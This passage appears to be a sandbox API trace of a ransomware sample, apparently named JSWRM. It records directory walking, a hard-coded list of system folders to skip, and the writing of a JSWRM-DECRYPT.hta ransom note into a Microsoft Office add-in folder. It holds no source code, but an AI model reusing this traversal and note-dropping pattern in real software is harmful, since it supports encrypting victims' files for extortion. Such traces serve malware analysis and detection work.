(lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2=".") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="..") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="...") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="windows") returned -1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="recovery") returned -1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="perflogs") returned -1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="system volume information") returned -1 [0123.270] lstrcmpiW (lpString1="Microsoft.OData.Edm.NetFX35.dll", lpString2="msocache") returned -1 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0123.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Edm.NetFX35.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Edm.NetFX35.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.OData.Edm.NetFX35.dll", lpUsedDefaultChar=0x0) returned 31 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Edm.NetFX35.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.OData.Edm.NetFX35.dll", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.OData.Edm.NetFX35.dll", lpUsedDefaultChar=0x0) returned 31 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e110 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.270] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17b058, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Office.Interop.Excel.dll", cAlternateFileName="MIDE30~1.DLL")) returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2=".") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="..") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="...") returned 1 [0123.270] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="windows") returned -1 [0123.270] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="recovery") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="perflogs") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="documents and settings") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="system volume information") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Excel.dll", lpString2="msocache") returned -1 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Excel.dll", lpUsedDefaultChar=0x0) returned 34 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Excel.dll", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Excel.dll", lpUsedDefaultChar=0x0) returned 34 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.271] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xedac0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Office.Interop.Outlook.dll", cAlternateFileName="MIDB50~1.DLL")) returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2=".") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="..") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="...") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="windows") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="recovery") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="perflogs") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="documents and settings") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="system volume information") returned -1 [0123.271] lstrcmpiW (lpString1="Microsoft.Office.Interop.Outlook.dll", lpString2="msocache") returned -1 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Outlook.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Outlook.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Outlook.dll", lpUsedDefaultChar=0x0) returned 36 [0123.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Outlook.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Outlook.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Outlook.dll", lpUsedDefaultChar=0x0) returned 36 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.272] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e4b8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.Spatial.NetFX35.dll", cAlternateFileName="MI069E~1.DLL")) returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2=".") returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="..") returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="...") returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="windows") returned -1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="recovery") returned -1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="perflogs") returned -1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="documents and settings") returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="system volume information") returned -1 [0123.272] lstrcmpiW (lpString1="Microsoft.Spatial.NetFX35.dll", lpString2="msocache") returned -1 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Spatial.NetFX35.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Spatial.NetFX35.dll", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Spatial.NetFX35.dll", lpUsedDefaultChar=0x0) returned 29 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Spatial.NetFX35.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0123.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Spatial.NetFX35.dll", cchWideChar=29, lpMultiByteStr=0x241128, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Spatial.NetFX35.dll", lpUsedDefaultChar=0x0) returned 29 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0123.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e570 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0123.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.272] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5e43de4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a0a8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Microsoft.WindowsAzure.StorageClient.dll", cAlternateFileName="MI3285~1.DLL")) returned 1 [0123.272] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2=".") returned 1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="..") returned 1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="...") returned 1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="windows") returned -1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="recovery") returned -1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="perflogs") returned -1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="documents and settings") returned 1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="system volume information") returned -1 [0123.273] lstrcmpiW (lpString1="Microsoft.WindowsAzure.StorageClient.dll", lpString2="msocache") returned -1 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.WindowsAzure.StorageClient.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.WindowsAzure.StorageClient.dll", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.WindowsAzure.StorageClient.dll", lpUsedDefaultChar=0x0) returned 40 [0123.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0123.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.WindowsAzure.StorageClient.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.WindowsAzure.StorageClient.dll", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.WindowsAzure.StorageClient.dll", lpUsedDefaultChar=0x0) returned 40 [0123.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0123.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0123.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.273] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ms", cAlternateFileName="")) returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="...") returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="windows") returned -1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="recovery") returned -1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="perflogs") returned -1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="documents and settings") returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="$RECYCLE.BIN") returned 1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="system volume information") returned -1 [0123.273] lstrcmpiW (lpString1="ms", lpString2="msocache") returned -1 [0123.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0123.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ms\\jswrm-decrypt.hta")) returned 0xffffffff [0123.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0123.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0123.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ms\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.276] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.276] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.277] CloseHandle (hObject=0x338) returned 1 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ms\\jswrm-decrypt.hta")) returned 0x20 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.277] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ms\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4023325f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0123.277] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.277] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4023325f, 